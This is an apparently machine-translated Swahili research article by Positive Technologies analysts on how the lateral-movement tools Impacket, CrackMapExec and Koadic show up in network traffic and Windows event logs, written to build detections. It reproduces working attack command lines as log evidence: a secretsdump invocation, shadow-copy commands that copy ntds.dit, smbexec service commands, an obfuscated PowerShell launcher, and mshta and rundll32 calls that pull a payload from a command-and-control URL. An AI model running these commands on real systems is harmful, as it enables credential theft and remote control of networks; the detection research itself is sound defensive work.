Idadi ya mashambulizi katika sekta ya ushirika inakua kila mwaka: kwa mfano kuliko mwaka 2016, na mwisho wa 2018 - kuliko kipindi kilichopita. Ikiwa ni pamoja na wale ambapo chombo kikuu cha kufanya kazi ni mfumo wa uendeshaji wa Windows. Mnamo 2017-2018, Dragonfly APT, APT28, ilifanya mashambulizi dhidi ya serikali na mashirika ya kijeshi huko Ulaya, Amerika Kaskazini na Saudi Arabia. Na tulitumia zana tatu kwa hii - , ΠΈ . Nambari yao ya chanzo iko wazi na inapatikana kwenye GitHub.
Ni muhimu kuzingatia kwamba zana hizi hazitumiwi kwa kupenya kwa awali, lakini kuendeleza mashambulizi ndani ya miundombinu. Washambuliaji huwatumia katika hatua tofauti za mashambulizi kufuatia kupenya kwa mzunguko. Hii, kwa njia, ni vigumu kuchunguza na mara nyingi tu kwa msaada wa teknolojia au zana zinazoruhusu . Zana hutoa kazi mbalimbali, kutoka kwa kuhamisha faili hadi kuingiliana na Usajili na kutekeleza amri kwenye mashine ya mbali. Tulifanya utafiti wa zana hizi ili kubaini shughuli zao za mtandao.
Tulichohitaji kufanya:
- Kuelewa jinsi zana za udukuzi zinavyofanya kazi. Jua ni washambuliaji wanahitaji kutumia nini na ni teknolojia gani wanaweza kutumia.
- Pata kile ambacho hakijatambuliwa na zana za usalama wa habari katika hatua za kwanza za shambulio. Hatua ya upelelezi inaweza kurukwa, ama kwa sababu mshambuliaji ni mvamizi wa ndani, au kwa sababu mshambuliaji anatumia shimo kwenye miundombinu ambayo haikujulikana hapo awali. Inakuwa inawezekana kurejesha mlolongo mzima wa matendo yake, hivyo hamu ya kuchunguza harakati zaidi.
- Ondoa chanya za uwongo kutoka kwa zana za kugundua uingilizi. Hatupaswi kusahau kwamba wakati vitendo fulani vinavyogunduliwa kwa misingi ya upelelezi pekee, makosa ya mara kwa mara yanawezekana. Kawaida katika miundombinu kuna idadi ya kutosha ya njia, zisizoweza kutofautishwa kutoka kwa halali kwa mtazamo wa kwanza, ili kupata taarifa yoyote.
Je, zana hizi huwapa washambuliaji nini? Ikiwa hii ni Impacket, basi washambuliaji hupokea maktaba kubwa ya moduli ambazo zinaweza kutumika katika hatua tofauti za shambulio linalofuata baada ya kuvunja mzunguko. Zana nyingi hutumia moduli za Impacket ndani - kwa mfano, Metasploit. Ina dcomexec na wmiexec kwa utekelezaji wa amri ya mbali, secretsdump ya kupata akaunti kutoka kwa kumbukumbu ambazo zimeongezwa kutoka kwa Impacket. Kama matokeo, utambuzi sahihi wa shughuli za maktaba kama hiyo utahakikisha ugunduzi wa derivatives.
Sio bahati mbaya kwamba waundaji waliandika "Powered by Impacket" kuhusu CrackMapExec (au CME kwa kifupi). Kwa kuongezea, CME ina utendakazi tayari kwa matukio maarufu: Mimikatz ya kupata manenosiri au heshi zao, utekelezaji wa Meterpreter au wakala wa Empire kwa utekelezaji wa mbali, na Bloodhound kwenye ubao.
Chombo cha tatu tulichochagua kilikuwa Koadic. Ni hivi majuzi, iliwasilishwa kwenye mkutano wa kimataifa wa hacker DEFCON 25 mnamo 2017 na inatofautishwa na mbinu isiyo ya kawaida: inafanya kazi kupitia HTTP, Java Script na Microsoft Visual Basic Script (VBS). Njia hii inaitwa kuishi nje ya ardhi: zana hutumia seti ya utegemezi na maktaba zilizojengwa ndani ya Windows. Watayarishi huiita COM Command & Control, au C3.
IMPACKET
Utendaji wa Impacket ni mpana sana, kuanzia upelelezi ndani ya AD na kukusanya data kutoka kwa seva za ndani za MS SQL, hadi mbinu za kupata vitambulisho: hili ni shambulio la upeanaji wa SMB, na kupata faili ya ntds.dit iliyo na heshi za manenosiri ya mtumiaji kutoka kwa kidhibiti cha kikoa. Impacket pia hutekeleza amri kwa mbali kwa kutumia mbinu nne tofauti: WMI, Huduma ya Usimamizi wa Kiratibu cha Windows, DCOM na SMB, na inahitaji kitambulisho kufanya hivyo.
Dampo la siri
Wacha tuangalie utupaji wa siri. Hii ni moduli inayoweza kulenga mashine za watumiaji na vidhibiti vya kikoa. Inaweza kutumika kupata nakala za maeneo ya kumbukumbu LSA, SAM, SECURITY, NTDS.dit, hivyo inaweza kuonekana katika hatua tofauti za mashambulizi. Hatua ya kwanza katika utendakazi wa moduli ni uthibitishaji kupitia SMB, ambayo inahitaji nenosiri la mtumiaji au heshi yake kutekeleza kiotomatiki Shambulio la Kupitisha Hash. Inayofuata inakuja ombi la kufungua ufikiaji wa Kidhibiti cha Huduma (SCM) na kupata ufikiaji wa sajili kupitia itifaki ya winreg, ambayo mshambulizi anaweza kujua data ya matawi ya riba na kupata matokeo kupitia SMB.
Katika Mtini. 1 tunaona jinsi hasa wakati wa kutumia itifaki ya winreg, ufikiaji unapatikana kwa kutumia ufunguo wa Usajili na LSA. Ili kufanya hivyo, tumia amri ya DCERPC na opcode 15 - OpenKey.
Mchele. 1. Kufungua ufunguo wa Usajili kwa kutumia itifaki ya winreg
Ifuatayo, wakati ufikiaji wa ufunguo unapatikana, maadili yanahifadhiwa kwa amri ya SaveKey na opcode 20. Impacket hufanya hivyo kwa njia maalum sana. Huhifadhi thamani kwenye faili ambayo jina lake ni mfuatano wa herufi 8 nasibu zilizoambatishwa na .tmp. Kwa kuongeza, upakiaji zaidi wa faili hii hutokea kupitia SMB kutoka kwenye saraka ya System32 (Mchoro 2).
Mchele. 2. Mpango wa kupata ufunguo wa Usajili kutoka kwa mashine ya mbali
Inatokea kwamba shughuli hizo kwenye mtandao zinaweza kugunduliwa na maswali kwa matawi fulani ya Usajili kwa kutumia itifaki ya winreg, majina maalum, amri na utaratibu wao.
Moduli hii pia huacha alama kwenye kumbukumbu ya tukio la Windows, na kuifanya iwe rahisi kugundua. Kwa mfano, kama matokeo ya kutekeleza amri
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DCKwenye logi ya Windows Server 2016 tutaona mlolongo ufuatao wa matukio:
1. 4624 - Logon ya mbali.
2. 5145 - kuangalia haki za upatikanaji wa huduma ya kijijini ya winreg.
3. 5145 - kuangalia haki za upatikanaji wa faili kwenye saraka ya System32. Faili ina jina nasibu lililotajwa hapo juu.
4. 4688 - kuunda mchakato wa cmd.exe unaozindua vssadmin:
βC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat5. 4688 - kuunda mchakato na amri:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat6. 4688 - kuunda mchakato na amri:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat7. 4688 - kuunda mchakato na amri:
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.batSmbexec
Kama zana nyingi za baada ya unyonyaji, Impacket ina moduli za kutekeleza amri kwa mbali. Tutazingatia smbexec, ambayo hutoa ganda la amri inayoingiliana kwenye mashine ya mbali. Moduli hii pia inahitaji uthibitishaji kupitia SMB, ama kwa nenosiri au heshi ya nenosiri. Katika Mtini. Katika Mchoro wa 3 tunaona mfano wa jinsi chombo hicho kinavyofanya kazi, katika kesi hii ni console ya msimamizi wa ndani.
Mchele. 3. Interactive smbexec console
Hatua ya kwanza ya smbexec baada ya uthibitishaji ni kufungua SCM kwa amri ya OpenSCManagerW (15). Hoja ni muhimu: sehemu ya MachineName ni DUMMY.
Mchele. 4. Ombi la kufungua Meneja wa Udhibiti wa Huduma
Ifuatayo, huduma imeundwa kwa kutumia amri ya CreateServiceW (12). Kwa upande wa smbexec, tunaweza kuona mantiki sawa ya ujenzi wa amri kila wakati. Katika Mtini. 5 kijani inaonyesha vigezo vya amri visivyobadilika, njano inaonyesha kile mshambuliaji anaweza kubadilisha. Ni rahisi kuona kwamba jina la faili inayoweza kutekelezwa, saraka yake na faili ya pato inaweza kubadilishwa, lakini wengine ni vigumu zaidi kubadili bila kuvuruga mantiki ya moduli ya Impacket.
Mchele. 5. Ombi la kuunda huduma kwa kutumia Meneja wa Udhibiti wa Huduma
Smbexec pia huacha athari dhahiri kwenye logi ya tukio la Windows. Kwenye logi ya Windows Server 2016 ya ganda la amri inayoingiliana na amri ya ipconfig, tutaona mlolongo wafuatayo wa matukio:
1. 4697 - ufungaji wa huduma kwenye mashine ya mwathirika:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - uundaji wa mchakato wa cmd.exe na hoja kutoka kwa hatua ya 1.
3. 5145 - kuangalia haki za kufikia faili ya __output katika saraka ya C $.
4. 4697 - ufungaji wa huduma kwenye mashine ya mwathirika.
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - uundaji wa mchakato wa cmd.exe na hoja kutoka kwa hatua ya 4.
6. 5145 - kuangalia haki za kufikia faili ya __output katika saraka ya C $.
Impacket ndio msingi wa ukuzaji wa zana za kushambulia. Inasaidia karibu itifaki zote katika miundombinu ya Windows na wakati huo huo ina sifa zake za tabia. Hapa kuna maombi maalum ya winreg, na matumizi ya API ya SCM yenye uundaji wa amri ya tabia, na muundo wa jina la faili, na SMB kushiriki SYSTEM32.
CRACKMAPEXEC
Zana ya CME imeundwa kimsingi kugeuza vitendo hivyo vya kawaida ambavyo mvamizi anapaswa kutekeleza ili kuendeleza ndani ya mtandao. Inakuruhusu kufanya kazi kwa kushirikiana na wakala anayejulikana wa Empire na Meterpreter. Ili kutekeleza amri kwa siri, CME inaweza kuzibatilisha. Kwa kutumia Bloodhound (zana tofauti ya upelelezi), mshambulizi anaweza kubinafsisha utafutaji wa kipindi amilifu cha msimamizi wa kikoa.
Bloodhound
Bloodhound, kama zana inayojitegemea, inaruhusu upelelezi wa hali ya juu ndani ya mtandao. Hukusanya data kuhusu watumiaji, mashine, vikundi, vipindi na hutolewa kama hati ya PowerShell au faili ya jozi. Itifaki za LDAP au SMB hutumika kukusanya taarifa. Moduli ya ujumuishaji wa CME huruhusu Bloodhound kupakuliwa kwa mashine ya mwathiriwa, kukimbia na kupokea data iliyokusanywa baada ya utekelezaji, na hivyo kuelekeza vitendo katika mfumo na kuzifanya zisionekane. Ganda la picha la Bloodhound linatoa data iliyokusanywa kwa njia ya grafu, ambayo hukuruhusu kupata njia fupi zaidi kutoka kwa mashine ya mvamizi hadi kwa msimamizi wa kikoa.
Mchele. 6. Bloodhound Interface
Ili kufanya kazi kwenye mashine ya mwathirika, moduli huunda kazi kwa kutumia ATSVC na SMB. ATSVC ni kiolesura cha kufanya kazi na Kipanga Kazi cha Windows. CME hutumia kitendakazi chake cha NetrJobAdd(1) kuunda kazi kwenye mtandao. Mfano wa kile moduli ya CME inatuma imeonyeshwa kwenye Mtini. 7: Hii ni simu ya amri ya cmd.exe na msimbo uliofichwa katika mfumo wa hoja katika umbizo la XML.
Mtini.7. Kuunda kazi kupitia CME
Baada ya kazi kuwasilishwa kwa ajili ya utekelezaji, mashine ya mwathirika huanza Bloodhound yenyewe, na hii inaweza kuonekana katika trafiki. Moduli hii ina sifa ya hoja za LDAP ili kupata vikundi vya kawaida, orodha ya mashine na watumiaji wote kwenye kikoa, na kupata taarifa kuhusu vipindi amilifu vya watumiaji kupitia ombi la SRVSVC NetSessEnum.
Mchele. 8. Kupata orodha ya vipindi vinavyoendelea kupitia SMB
Aidha, uzinduzi wa Bloodhound kwenye mashine ya mwathirika na ukaguzi umewezeshwa huambatana na tukio lenye ID 4688 (uundaji wa mchakato) na jina la mchakato. Β«C:WindowsSystem32cmd.exeΒ». Kinachojulikana juu yake ni hoja za mstari wa amri:
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , β¦ , 40,41 )-jOIN'' ) "Enum_avproducts
Moduli ya enum_avproducts inavutia sana kutoka kwa mtazamo wa utendaji na utekelezaji. WMI hukuruhusu kutumia lugha ya maswali ya WQL kupata data kutoka kwa vitu anuwai vya Windows, ambayo kimsingi ndiyo moduli hii ya CME hutumia. Hutoa maswali kwa madarasa ya AntiSpywareProduct na AntiΠirusProduct kuhusu zana za ulinzi zilizowekwa kwenye mashine ya mwathiriwa. Ili kupata data muhimu, moduli huunganisha kwenye nafasi ya majina ya rootSecurityCenter2, kisha hutoa swali la WQL na kupokea jibu. Katika Mtini. Kielelezo cha 9 kinaonyesha yaliyomo katika maombi na majibu kama haya. Katika mfano wetu, Windows Defender ilipatikana.
Mchele. 9. Shughuli ya mtandao ya moduli ya enum_avproducts
Mara nyingi, ukaguzi wa WMI (Fuatilia Shughuli ya WMI), ambayo katika matukio yake unaweza kupata taarifa muhimu kuhusu maswali ya WQL, inaweza kulemazwa. Lakini ikiwashwa, basi hati ya enum_avproducts ikiendeshwa, tukio lenye ID 11 litahifadhiwa. Litakuwa na jina la mtumiaji aliyetuma ombi na jina katika rootSecurityCenter2 namespace.
Kila moja ya moduli za CME zilikuwa na vizalia vyake vya programu, iwe ni hoja mahususi za WQL au uundaji wa aina fulani ya kazi katika kipanga ratiba cha kazi chenye mtafaruku na shughuli mahususi za Bloodhound katika LDAP na SMB.
KOADIC
Kipengele tofauti cha Koadic ni matumizi ya vikalimani vya JavaScript na VBScript vilivyojengwa ndani ya Windows. Kwa maana hii, inafuata hali ya maisha kutoka kwa ardhi - ambayo ni, haina utegemezi wa nje na hutumia zana za kawaida za Windows. Hii ni chombo cha Amri na Udhibiti kamili (CnC), tangu baada ya kuambukizwa "implant" imewekwa kwenye mashine, ikiruhusu kudhibitiwa. Mashine kama hiyo, katika istilahi ya Koadic, inaitwa "zombie". Ikiwa hakuna haki za kutosha za uendeshaji kamili kwa upande wa mwathirika, Koadic ana uwezo wa kuziinua kwa kutumia mbinu za Udhibiti wa Akaunti ya Mtumiaji (UAC bypass).
Mchele. 10. Koadic Shell
Mwathiriwa lazima aanzishe mawasiliano na seva ya Amri na Udhibiti. Ili kufanya hivyo, anahitaji kuwasiliana na URI iliyoandaliwa hapo awali na kupokea mwili mkuu wa Koadic kwa kutumia moja ya hatua. Katika Mtini. Kielelezo cha 11 kinaonyesha mfano wa kiweka hatua cha mshta.
Mchele. 11. Kuanzisha kipindi na seva ya CnC
Kulingana na kigezo cha majibu WS, inakuwa wazi kwamba utekelezaji hutokea kupitia WScript.Shell, na vigeu STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE vina taarifa muhimu kuhusu vigezo vya kipindi cha sasa. Hii ni jozi ya kwanza ya jibu la ombi katika muunganisho wa HTTP na seva ya CnC. Maombi yanayofuata yanahusiana moja kwa moja na utendaji wa moduli zinazoitwa (vipandikizi). Moduli zote za Koadic hufanya kazi tu na kipindi kinachoendelea na CnC.
Mimikatz
Kama vile CME inavyofanya kazi na Bloodhound, Koadic hufanya kazi na Mimikatz kama programu tofauti na ina njia nyingi za kuizindua. Ifuatayo ni jozi ya jibu la ombi la kupakua kipandikizi cha Mimikatz.
Mchele. 12. Kuhamisha Mimikatz kwa Koadic
Unaweza kuona jinsi umbizo la URI katika ombi limebadilika. Sasa ina thamani ya kutofautisha kwa csrf, ambayo inawajibika kwa moduli iliyochaguliwa. Usijali jina lake; Sote tunajua kuwa CSRF kawaida hueleweka kwa njia tofauti. Jibu lilikuwa kundi kuu sawa la Koadic, ambalo kanuni inayohusiana na Mimikatz iliongezwa. Ni kubwa kabisa, kwa hivyo wacha tuangalie vidokezo muhimu. Hapa tuna maktaba ya Mimikatz iliyosimbwa katika base64, darasa la .NET la mfululizo ambalo litaiingiza, na hoja za kuzindua Mimikatz. Matokeo ya utekelezaji hupitishwa kwenye mtandao kwa maandishi wazi.
Mchele. 13. Matokeo ya kuendesha Mimikatz kwenye mashine ya mbali
Ekc_cmd
Koadic pia ina moduli zinazoweza kutekeleza amri kwa mbali. Hapa tutaona njia sawa ya kizazi cha URI na vijiti vya kawaida vya sid na csrf. Katika kesi ya moduli ya exec_cmd, msimbo huongezwa kwa mwili ambao una uwezo wa kutekeleza amri za shell. Hapa chini kunaonyeshwa msimbo kama huo ulio katika majibu ya HTTP ya seva ya CnC.
Mchele. 14. Pandikiza msimbo exec_cmd
Tofauti ya GAWTUUGCFI yenye sifa ya WS inayojulikana inahitajika kwa utekelezaji wa msimbo. Kwa msaada wake, kuingiza huita shell, kusindika matawi mawili ya kanuni - shell.exec na kurudi kwa mkondo wa data ya pato na shell.run bila kurudi.
Koadic sio zana ya kawaida, lakini ina vibaki vyake ambavyo vinaweza kupatikana katika trafiki halali:
- uundaji maalum wa maombi ya HTTP,
- kwa kutumia winHttpRequests API,
- kuunda kitu cha WScript.Shell kupitia ActiveXObject,
- mwili mkubwa unaoweza kutekelezwa.
Uunganisho wa awali umeanzishwa na hatua, hivyo inawezekana kuchunguza shughuli zake kupitia matukio ya Windows. Kwa mshta, hili ni tukio 4688, ambalo linaonyesha uundaji wa mchakato na sifa ya kuanza:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6Wakati Koadic inaendeshwa, unaweza kuona matukio mengine 4688 yenye sifa zinazoitambulisha kikamilifu:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1Matokeo
Maisha ya kutegemea ardhi yanazidi kupata umaarufu miongoni mwa wahalifu. Wanatumia zana na mifumo iliyojengwa ndani ya Windows kwa mahitaji yao. Tunaona zana maarufu za Koadic, CrackMapExec na Impacket zinazofuata kanuni hii zikizidi kuonekana katika ripoti za APT. Idadi ya uma kwenye GitHub za zana hizi pia inakua, na mpya zinaonekana (tayari kuna takriban elfu moja sasa). Mtindo huo unazidi kupata umaarufu kwa sababu ya urahisi wake: wavamizi hawahitaji zana za wahusika wengine; tayari wako kwenye mashine za wahasiriwa na huwasaidia kupita hatua za usalama. Tunazingatia kujifunza mawasiliano ya mtandao: kila chombo kilichoelezwa hapo juu kinaacha athari zake katika trafiki ya mtandao; utafiti wa kina wao ulituruhusu kufundisha bidhaa zetu kuwagundua, ambayo hatimaye husaidia kuchunguza mlolongo mzima wa matukio ya mtandao yanayowahusisha.
Waandishi:
- Anton Tyurin, Mkuu wa Idara ya Huduma za Wataalam, Kituo cha Usalama cha Mtaalam wa PT, Teknolojia Chanya.
- Egor Podmokov, mtaalam, Kituo cha Usalama cha Mtaalam wa PT, Teknolojia Chanya
Chanzo: mapenzi.com